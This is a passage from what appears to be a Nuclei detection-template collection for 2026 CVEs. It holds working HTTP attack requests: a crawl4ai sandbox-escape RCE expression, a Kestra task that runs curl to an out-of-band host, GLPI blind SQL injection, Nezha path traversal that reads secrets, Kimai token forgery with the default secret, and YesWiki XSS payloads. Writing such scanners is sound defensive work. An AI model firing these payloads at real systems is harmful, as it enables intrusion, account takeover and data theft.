tags: cve,cve2026,crawl4ai,unclecode,rce,sandbox-escape\n\nvariables:\n  marker: \"{{to_lower(rand_base(6))}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /crawl HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\n          \"urls\": [\n            \"raw://<html><body><div>crawl4ai</div></body></html>\"\n          ],\n          \"crawler_config\": {\n            \"type\": \"CrawlerRunConfig\",\n            \"params\": {\n              \"extraction_strategy\": {\n                \"type\": \"JsonCssExtractionStrategy\",\n                \"params\": {\n                  \"schema\": {\n                    \"name\": \"probe\",\n                    \"baseSelector\": \"div\",\n                    \"fields\": [\n                      {\n                        \"name\": \"probe\",\n                        \"type\": \"computed\",\n                        \"expression\": \"(lambda L: (L.append((L[0].gi_frame.f_back.f_back.f_back.f_builtins['__import__']('os').popen('echo {{marker}}$((31337*1337))').read() for q in [1])), list(L[0]))[1])([])\"\n                      }\n                    ]\n                  }\n                }\n              }\n            }\n          }\n        }\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{marker}}41897569\"\n\n      - type: word\n        part: body\n        words:\n          - '\"server_processing_time_s\"'\n          - '\"extracted_content\"'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100f4bf6b429f82073d658e3eb1c644a06c8ebe04ad04c17deaaefd3a671d3d0192022100db3c08581835f52760e4a9854f591dbc679598518a97d3712bd0ca30b7044565:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-53753.yaml","vuln_id":"cve-2026-53753"},{"raw":"id: CVE-2026-53629\n\ninfo:\n  name: GLPI - Blind SQL Injection in History Log Filter (LogBleed)\n  author: Boreas37\n  severity: high\n  description: |\n    GLPI versions before 10.0.26 and 11.0.8 are vulnerable to a blind SQL injection in the history log filter. The Log::convertFiltersValuesToSqlCriteria() function splits the affected_fields filter into key:operator:value parts and DBmysqlIterator::analyseCrit() does not quote OR, AND and NOT as column names, allowing an authenticated user with logs READ right to inject arbitrary SQL. Verified against glpi/glpi:10.0.25 (Docker + MariaDB): filter \"OR::1 AND sleep(5)\" produces \"... AND (((((1 AND sleep(5))))))\" in the query and the request takes ~5s. On 10.0.26 the same payload is rejected (~30ms).\n  reference:\n    - https://github.com/glpi-project/glpi/security/advisories/GHSA-cpcj-x335-5cmh\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-53629\n    cwe-id: CWE-89\n  metadata:\n    max-request: 4\n    verified: true\n    shodan-query: title:\"Authentication - GLPI\"\n  tags: cve,cve2026,glpi,sqli,blind,time-based,authenticated\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'id=\"login_name\"'\n          - '_glpi_csrf_token'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: uname\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'id=\"login_name\" name=\"([^\"]+)\"'\n\n      - type: regex\n        name: pwd\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'id=\"login_password\" name=\"([^\"]+)\"'\n\n      - type: regex\n        name: token\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '_glpi_csrf_token\" value=\"([a-f0-9]+)\"'\n\n  - raw:\n      - |\n        POST /front/login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        {{uname}}={{username}}&{{pwd}}={{password}}&_glpi_csrf_token={{token}}&submit=Login\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"logout.php\"\n        internal: true\n\n  - raw:\n      - |\n        GET /front/user.form.php?id=2 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 30s\n        GET /front/log/export.php?itemtype=User&id=2&filter%5Baffected_fields%5D%5B0%5D=OR::1%20AND%20sleep(5) HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"duration >= 5\"\n        condition: and\n\n      - type: word\n        part: body\n        words:\n          - \"ID;Date;User;Field;Update\"\n# digest: 4a0a0047304502206817a6b65217ed6b0bde9aa2f7ec273962188d9cdb38a3bc73f42f96b6ddfe73022100b7c17e628005fea8c50cc29a670ce9113ef5a62d44f6fb37fd03184664b5aab1:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-53629.yaml","vuln_id":"cve-2026-53629"},{"raw":"id: CVE-2026-53595\n\ninfo:\n  name: FreeScout < 1.8.224 - Invite Hash Authorization Bypass\n  author: str4k3r\n  severity: critical\n  description: |\n    FreeScout prior to 1.8.224 contains an authentication bypass caused by improper invite_hash handling and decryption failure in user setup endpoint, letting anonymous attackers reset credentials and log in as the lowest-id activated user, exploit requires no authentication.\n  impact: |\n    Anonymous attackers can reset email and password of the lowest-id activated user, gaining full access including administrator privileges.\n  remediation: |\n    Upgrade to version 1.8.224 or later.\n  reference:\n    - https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-jqj5-r72v-v29g\n    - https://github.com/freescout-help-desk/freescout/commit/c4688c31\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-53595\n  classification:\n    cve-id: CVE-2026-53595\n    epss-score: 0.01945\n    epss-percentile: 0.79292\n    cwe-id: CWE-289\n    cvss-score: 9.4\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: freescout-help-desk\n    product: freescout\n    shodan-query: http.title:\"FreeScout\"\n    fofa-query: title=\"FreeScout\" || body=\"freescout\"\n  tags: cve,cve2026,freescout,helpdesk,laravel,authbypass,unauth\n\nhttp:\n  - raw:\n      - |\n        GET /user-setup/%20/9999999999 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"name=\\\"password_confirmation\\\"\", \"User Setup Wizard\")'\n          - '!contains(body, \"No invite was found\")'\n        condition: and\n# digest: 4b0a00483046022100a69538f322feff61acb8d0d4b38dc78227493bf0a9c7dc6b0ea9b5c2db28f5fd022100e88e1575620effb22bc892c3784b040143da023f72181270ffdff60d5dc6c4bd:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-53595.yaml","vuln_id":"cve-2026-53595"},{"raw":"id: CVE-2026-53576\n\ninfo:\n  name: Kestra <= 1.3.20 - Remote Code Execution\n  author: 0x_Akoko,pdteam,aryu-ru\n  severity: critical\n  description: |\n    Kestra <= 1.3.20 contains an authentication bypass caused by misclassification of /configs endpoint in REST API filter, letting unauthenticated attackers create and execute root-level tasks, exploit requires unauthenticated access to /configs endpoint.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code as root inside the container, potentially compromising the host via Docker socket access.\n  remediation: |\n    Update to versions 1.0.45 or 1.3.21 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-53576\n    - https://github.com/kestra-io/kestra/security/advisories/GHSA-2q47-568g-9h4f\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-53576\n    epss-score: 0.03189\n    epss-percentile: 0.87526\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: kestra\n    product: kestra\n    shodan-query: title:\"Kestra\"\n    fofa-query: title=\"Kestra\"\n  tags: cve,cve2026,kestra,rce,oast,intrusive,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(body, \"KESTRA\", \"<title>Kestra\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/main/flows/configs HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-yaml\n\n        id: configs\n        namespace: configs\n        tasks:\n          - id: pwn\n            type: io.kestra.plugin.scripts.shell.Commands\n            taskRunner:\n              type: io.kestra.plugin.core.runner.Process\n            commands:\n              - curl -m 5 -s http://{{interactsh-url}}/rce\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 409'\n          - 'contains(body, \"configs\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/main/executions/configs/configs HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----KestraBoundary\n\n        ------KestraBoundary--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_any(interactsh_protocol, \"http\", \"dns\")'\n          - 'status_code == 200 || status_code == 409'\n        condition: and\n# digest: 4a0a004730450220503aca8317fe9fb232ce418f003a31a8abba4596d4ef6dc26cac6bc3309fc0a3022100b75b0398abdc213bdfcaf542317e542646ba2971d3055a87bf1433dbbc27d6dd:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-53576.yaml","vuln_id":"cve-2026-53576"},{"raw":"id: CVE-2026-53519\n\ninfo:\n  name: Nezha Dashboard < 2.0.13 - Path Traversal\n  author: Aryu-RU,str4k3r\n  severity: critical\n  description: |\n    Nezha Monitoring < 2.0.13 contains a path traversal caused by improper prefix checking in the dashboard's NoRoute handler, letting unauthenticated attackers read arbitrary files via crafted URLs.\n  impact: |\n    Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive configuration or data files.\n  remediation: |\n    Update to version 2.0.13 or later.\n  reference:\n    - https://github.com/nezhahq/nezha/security/advisories/GHSA-5c25-7vpj-9mqh\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-53519\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-53519\n    epss-score: 0.01928\n    epss-percentile: 0.79091\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    shodan-query: title:\"Nezha\"\n  tags: cve,cve2026,nezha,lfi,traversal,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/dashboard%2e%2e/data/config.yaml\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"jwt_secret_key:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100e646c5e64fb5aa4a123ae105e0b593790d7e028901a1747655eb705fe27fe8c0022034f9fc3fa0e370a0da3f6c02401943850d10eedfc65433a09dd63cd5ca00a2c3:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-53519.yaml","vuln_id":"cve-2026-53519"},{"raw":"id: CVE-2026-52824\n\ninfo:\n  name: Kimai <= 2.57.0 - Default APP_SECRET Authentication Bypass\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    Kimai Docker images <= 2.57.0 ship with a hardcoded APP_SECRET of \"change_this_to_something_unique\". This default secret is used by Symfony's SignatureHasher to HMAC-sign login links and remember-me cookies. An unauthenticated attacker who knows this default secret can forge valid authentication tokens and hijack any user account, including the super-admin.\n  impact: |\n    An unauthenticated remote attacker can forge valid login-link URLs to authenticate as any user (including administrators) without knowing their password, achieving full account takeover.\n  remediation: |\n    Upgrade to Kimai >= 2.58.0 which generates a random APP_SECRET on first boot. Alternatively, manually set a unique APP_SECRET in your .env.local file.\n  reference:\n    - https://github.com/advisories/GHSA-jr9p-4h4j-6c58\n    - https://github.com/kimai/kimai/releases/tag/2.58.0\n  classification:\n    cve-id: CVE-2026-52824\n    epss-score: 0.02062\n    epss-percentile: 0.80501\n    cwe-id: CWE-1188\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: kimai\n    product: kimai\n    shodan-query: title:\"Kimai\"\n    fofa-query: title=\"Kimai\"\n  tags: cve,cve2026,kimai,default-secret,auth-bypass,account-takeover\n\nvariables:\n  fh: \"D60nAF03Qti0aU2B2Z5nVMOl_evP1uYHUVXRtHzgea0~\"\n  secret: \"change_this_to_something_unique\"\n  expiry: \"{{unix_time()+900}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/en/login\"\n\n    matchers:\n      - type: word\n        words:\n          - \"Kimai\"\n          - \"login_check\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /en/auth/link/check?user=admin&expires={{expiry}}&hash={{replace(replace(replace(base64(hex_decode(hmac(\"sha256\",fh+\":\"+expiry+\":admin\",secret))),\"+\",\"-\"),\"/\",\"_\"),\"=\",\"~\")}}{{fh}} HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: false\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - \"KIMAI_REMEMBER=App.Entity.User\"\n\n      - type: status\n        status:\n          - 302\n\n      - type: word\n        part: header\n        words:\n          - \"/login\"\n        negative: true\n# digest: 490a00463044022057ef860c36165ca7370ea81e3f68179629abb316e809c764b405fb3c684d81c10220026d10ad82a729449792a092a79e24fb52985b7d8a60bbe87720ef56ac30063e:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-52824.yaml","vuln_id":"cve-2026-52824"},{"raw":"id: CVE-2026-52815\n\ninfo:\n  name: Gogs < 0.14.3 - Unauthenticated Organization Teams Disclosure\n  author: 0x_Akoko\n  severity: low\n  description: |\n    Gogs before version 0.14.3 contains an unauthenticated information disclosure vulnerability. The GET /api/v1/orgs/:orgname/teams endpoint returns all teams for any organization without requiring authentication. The route group lacks the reqToken() middleware, exposing team IDs, names, descriptions, and permission levels to any unauthenticated caller.\n  impact: |\n    An unauthenticated attacker can enumerate all teams within any organization including private teams, discover permission levels, map organizational structure, and identify high-value admin and owner teams for targeted attacks.\n  remediation: |\n   Update Gogs to version 0.14.3 or later.\n  reference:\n    - https://github.com/gogs/gogs/security/advisories/GHSA-744x-3838-5r56\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-52815\n  classification:\n    cvss-metrics: \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\"\n    cvss-score: 4.3\n    cve-id: CVE-2026-52815\n    epss-score: 0.01488\n    epss-percentile: 0.72927\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: gogs\n    product: gogs\n    shodan-query: 'http.title:\"Gogs\"'\n    fofa-query: title=\"Gogs\"\n  tags: cve,cve2026,gogs,exposure,unauth\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/repos/search?limit=1\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n        internal: true\n        condition: and\n\n    extractors:\n      - type: regex\n        name: orgname\n        part: body\n        group: 1\n        regex:\n          - '\"username\"\\s*:\\s*\"([^\"]+)\"'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/orgs/{{orgname}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"username\\\"\", \"\\\"full_name\\\"\")'\n        internal: true\n        condition: and\n\n  - raw:\n      - |\n        GET /api/v1/orgs/{{orgname}}/teams HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"id\\\"\", \"\\\"name\\\"\", \"\\\"permission\\\"\")'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n# digest: 490a00463044022026281de2883f48b3b96790830441846fa29b6edb7ac18cd1f54c820c3259bb0502206b4f47886f0cfcc89699d20254cc4d73428ad0778091b2595930c970a76265c6:922c64590222798bb761d5b6d8e72950","severity":"low","template_path":"http/cves/2026/CVE-2026-52815.yaml","vuln_id":"cve-2026-52815"},{"raw":"id: CVE-2026-52806\n\ninfo:\n  name: Gogs <= 0.14.2 - Authenticated RCE via git rebase Argument Injection\n  author: DhiyaneshDk,pdteam\n  severity: critical\n  description: |\n    Gogs is an open source self-hosted Git service. Prior to 0.14.3, Gogs allows authenticated users to achieve Remote Code Execution (RCE) on the server by creating a pull request with a specially crafted branch name that injects the --exec flag into the git rebase command during the \"Rebase before merging\" merge operation.\n  impact: |\n    Authenticated users can execute arbitrary code on the server, potentially leading to full system compromise.\n  remediation: This vulnerability is fixed in 0.14.3.\n  reference:\n    - https://www.cve.org/CVERecord?id=CVE-2026-52806\n    - https://github.com/portbuster1337/CVE-2026-52806\n    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/gogs_rebase_rce.rb\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 9.9\n    cve-id: CVE-2026-52806\n    epss-score: 0.07934\n    epss-percentile: 0.94471\n    cwe-id: CWE-77\n    cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: gogs\n    product: gogs\n    shodan-query: title:\"Sign In - Gogs\"\n    google-query: intitle:\"Sign In - Gogs\"\n    fofa-query: title=\"sign in - gogs\"\n  tags: cve,cve2026,gogs,rce,argument-injection,git,authenticated,passive,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/user/login\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '<meta property=\"og:description\" content=\"Gogs is a painless self-hosted Git service.\">'\n          - '<meta name=\"description\" content=\"Gogs is a painless self-hosted Git service\" />'\n          - \"<title>Sign In - Gogs</title>\"\n        condition: or\n\n      - type: status\n        status:\n          - 200\n\n      - type: dsl\n        dsl:\n          - compare_versions(gogs_version, '<= 0.14.2')\n\n    extractors:\n      - type: regex\n        name: gogs_version\n        part: body\n        group: 1\n        regex:\n          - 'Version: (\\d+\\.\\d+\\.\\d+)'\n        internal: true\n\n      - type: regex\n        group: 1\n        regex:\n          - 'Version: (\\d+\\.\\d+\\.\\d+)'\n        part: body\n# digest: 4a0a00473045022051efc92edb7c3daae5009d4d137880e78c5b84079534bc0e98250df1bf30283c022100ecb3b8163654804220e078f3991d172bf4bbb0998021da8c71dd228b31728f89:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-52806.yaml","vuln_id":"cve-2026-52806"},{"raw":"id: CVE-2026-52774\n\ninfo:\n  name: YesWiki Bazar Widget - Reflected XSS via 'id' Parameter\n  author: 0x_Akoko\n  severity: medium\n  description: |\n   YesWiki's Bazar widget handler reflects the id GET parameter into HTML attributes using strip_tags() only. strip_tags() does not escape double quotes, allowing an attacker to break out of the data-formid attribute and inject arbitrary event handlers.\n  impact: |\n   Attackers can execute arbitrary JavaScript in victims' browsers.\n  remediation: |\n   Upgrade YesWiki to version 4.6.6 or later where output encoding is applied.\n  reference:\n    - https://github.com/YesWiki/yeswiki/security/advisories/GHSA-r5xw-gcgw-hwp5\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-52774\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-52774\n    epss-score: 0.00507\n    epss-percentile: 0.42329\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: yeswiki\n    product: yeswiki\n    shodan-query: http.html:\"YesWiki\"\n    fofa-query: body=\"YesWiki\"\n  tags: cve,cve2026,yeswiki,xss,reflected\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/NoSuchPage/widget?id=%22%20onmouseover=%22alert(document.domain)%22%20x=%22\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'data-formid=\"\" onmouseover=\"alert(document.domain)\" x=\"\"'\n          - 'widgetapp'\n        condition: and\n\n      - type: word\n        part: body\n        words:\n          - \"yeswiki\"\n          - \"YesWiki\"\n        condition: or\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a004830460221009cd1cbd8d1509b7e761597e3cde93ef6e625b64c0a9eaeec926cd4fe93bfdac2022100fa12d0fbbddbb148e1ce0d1ef33b8351898037692571faccea3bcc3661616cf6:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-52774.yaml","vuln_id":"cve-2026-52774"},{"raw":"id: CVE-2026-52773\n\ninfo:\n  name: YesWiki Archived Revision - Cross-Site Scripting\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    YesWiki's archived-revision view reflects the time GET parameter into a hidden HTML input in handlers/page/show.php without escaping. Because MySQL coerces malformed DATETIME strings, an attacker can append an XSS payload after a valid revision timestamp.\n  impact: |\n   Attackers can execute arbitrary JavaScript in victims' browsers.\n  remediation: |\n   Upgrade YesWiki to version 4.6.6 or later where output encoding is applied.\n  reference:\n    - https://github.com/YesWiki/yeswiki/security/advisories/GHSA-35f3-pg38-486f\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-52773\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-52773\n    epss-score: 0.00478\n    epss-percentile: 0.40423\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: yeswiki\n    product: yeswiki\n    shodan-query: http.html:\"YesWiki\"\n    fofa-query: body=\"YesWiki\"\n  tags: cve,cve2026,yeswiki,xss\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?PagePrincipale/revisions\"\n      - \"{{BaseURL}}/?GererSite/revisions\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"&quot;time&quot;\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: timestamp\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '&quot;time&quot;:&quot;(\\d{4}-\\d{2}-\\d{2}\\s\\d{2}:\\d{2}:\\d{2})&quot;'\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?PagePrincipale&time={{url_encode(timestamp)}}%22%3E%3Csvg%20onload%3Dalert(document.domain)%3E\"\n      - \"{{BaseURL}}/?GererSite&time={{url_encode(timestamp)}}%22%3E%3Csvg%20onload%3Dalert(document.domain)%3E\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"><svg onload=alert(document.domain)>'\n          - 'name=\"time\"'\n        condition: and\n\n      - type: word\n        part: body\n        words:\n          - \"yeswiki\"\n        case-insensitive: true\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100fd914d46a7f54faf6d27c89c326f628b412ac38467a6edaa6b54b83246f61f7702203d53d9618e22be7b4d8988bf637a4d05434d6162d6d87c58f0324e58c1b2a94e:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-52773.yaml","vuln_id":"cve-2026-52773"},{"raw":"id: CVE-2026-50751\n\ninfo:\n  name: Check Point IKEv1 Remote-Access VPN - Certificate Authentication Bypass\n  author: watchTowr,DhiyaneshDk\n  severity: critical\n  description: |\n    IKEv1 key exchange contains a broken authentication caused by logic flow weakness in Remote Access and Mobile Access certificate validation, letting unauthenticated remote attackers bypass user authentication and establish VPN connections without valid passwords, exploit requires use of deprecated IKEv1.\n  impact: |\n    Unauthenticated attackers can bypass user authentication and establish remote VPN connections, compromising network security.\n  remediation: |\n    Apply Check Point hotfix sk185033 which restores the certificate signature verification in verifyMessagePhase1.\n  reference:\n    - https://labs.watchtowr.com/marking-your-own-homework-check-point-remote-access-vpn-ikev1-authentication-bypass-cve-2026-50751/\n    - https://support.checkpoint.com/results/sk/sk185033\n    - https://github.com/watchtowrlabs/watchTowr-vs-Check-Point-CVE-2026-50751\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n    cvss-score: 10.0\n    cve-id: CVE-2026-50751\n    epss-score: 0.83771\n    epss-percentile: 0.99677\n    cwe-id: CWE-287,CWE-295\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: checkpoint\n    product: quantum_security_gateway\n    shodan-query: html:\"Check Point SSL Network Extender\"\n  tags: cve,cve2026,checkpoint,vpn,ike,ikev1,auth-bypass,js,kev,vkev\n\njavascript:\n  - pre-condition: |\n      isUDPPortOpen(Host, Port);\n\n    code: |\n      (function() {\n        const c  = require(\"nuclei/net\");\n        const nb = require(\"nuclei/bytes\");\n        const USE_TCPT = (parseInt(Port) === 443);\n\n        function h2b(hex) {\n          const r=[];\n          for(let i=0;i<hex.length;i+=2) r.push(parseInt(hex.substr(i,2),16));\n          return r;\n        }\n        function b2h(arr) {\n          let s=\"\";\n          for(let i=0;i<arr.length;i++) s+=('0'+arr[i].toString(16)).slice(-2);\n          return s;\n        }\n        function rd32(a,i){return((a[i]<<24)|(a[i+1]<<16)|(a[i+2]<<8)|a[i+3])>>>0;}\n        function wr32(v){return[(v>>>24)&0xff,(v>>>16)&0xff,(v>>>8)&0xff,v&0xff];}\n\n        function sha1(data) {\n          let m=Array.from(data),bl=m.length*8;\n          m.push(0x80);\n          while(m.length%64!==56)m.push(0);\n          for(let i=7;i>=0;i--)m.push((bl/Math.pow(2,i*8))&0xff);\n          let H=[0x67452301,0xEFCDAB89,0x98BADCFE,0x10325476,0xC3D2E1F0];\n          for(let b=0;b<m.length;b+=64){\n            let W=[];\n            for(let j=0;j<16;j++)W.push(rd32(m,b+j*4));\n            for(let j=16;j<80;j++){const n=W[j-3]^W[j-8]^W[j-14]^W[j-16];W.push(((n<<1)|(n>>>31))>>>0);}\n            let a=H[0],hb=H[1],hc=H[2],d=H[3],e=H[4];\n            for(let j=0;j<80;j++){\n              let f,k;\n              if(j<20){f=((hb&hc)|(~hb&d))>>>0;k=0x5A827999;}\n              else if(j<40){f=(hb^hc^d)>>>0;k=0x6ED9EBA1;}\n              else if(j<60){f=((hb&hc)|(hb&d)|(hc&d))>>>0;k=0x8F1BBCDC;}\n              else{f=(hb^hc^d)>>>0;k=0xCA62C1D6;}\n              const t=(((a<<5)|(a>>>27))>>>0)+f+e+k+W[j];\n              e=d;d=hc;hc=((hb<<30)|(hb>>>2))>>>0;hb=a;a=t>>>0;\n            }\n            H[0]=(H[0]+a)>>>0;H[1]=(H[1]+hb)>>>0;H[2]=(H[2]+hc)>>>0;\n            H[3]=(H[3]+d)>>>0;H[4]=(H[4]+e)>>>0;\n          }\n          let r=[];for(const h of H)r=r.concat(wr32(h));return r;\n        }\n\n        function hmac1(key,msg) {\n          let k=key.slice();\n          if(k.length>64)k=sha1(k);\n          while(k.length<64)k.push(0);\n          return sha1([...k.map(x=>x^0x5c),...sha1([...k.map(x=>x^0x36),...msg])]);\n        }\n\n        const SB=[99,124,119,123,242,107,111,197,48,1,103,43,254,215,171,118,202,130,201,125,250,89,71,240,173,212,162,175,156,164,114,192,183,253,147,38,54,63,247,204,52,165,229,241,113,216,49,21,4,199,35,195,24,150,5,154,7,18,128,226,235,39,178,117,9,131,44,26,27,110,90,160,82,59,214,179,41,227,47,132,83,209,0,237,32,252,177,91,106,203,190,57,74,76,88,207,208,239,170,251,67,77,51,133,69,249,2,127,80,60,159,168,81,163,64,143,146,157,56,245,188,182,218,33,16,255,243,210,205,12,19,236,95,151,68,23,196,167,126,61,100,93,25,115,96,129,79,220,34,42,144,136,70,238,184,20,222,94,11,219,224,50,58,10,73,6,36,92,194,211,172,98,145,149,228,121,231,200,55,109,141,213,78,169,108,86,244,234,101,122,174,8,186,120,37,46,28,166,180,198,232,221,116,31,75,189,139,138,112,62,181,102,72,3,246,14,97,53,87,185,134,193,29,158,225,248,152,17,105,217,142,148,155,30,135,233,206,85,40,223,140,161,137,13,191,230,66,104,65,153,45,15,176,84,187,22];\n        const RC=[1,2,4,8,16,32,64,128,27,54];\n        function xt(a){return((a<<1)^(a&0x80?0x1b:0))&0xff;}\n        function gm(a,b){let r=0;for(let i=0;i<8;i++){if(b&1)r^=a;a=xt(a);b>>=1;}return r;}\n        function sw(w){return(SB[w>>>24]<<24|SB[(w>>16)&0xff]<<16|SB[(w>>8)&0xff]<<8|SB[w&0xff])>>>0;}\n        function aesKex(key){\n          let w=[];\n          for(let i=0;i<8;i++)w.push(rd32(key,i*4));\n          for(let i=8;i<60;i++){\n            let t=w[i-1];\n            if(i%8===0)t=(sw(((t<<8)|(t>>>24))>>>0)^(RC[i/8-1]<<24))>>>0;\n            else if(i%8===4)t=sw(t);\n            w.push((w[i-8]^t)>>>0);\n          }\n          return w;\n        }\n        function cbcEnc(key,iv,pt){\n          const rk=aesKex(key);\n          function aesBlk(blk){\n            let s=blk.slice();\n            function ark(r){for(let cc=0;cc<4;cc++){const 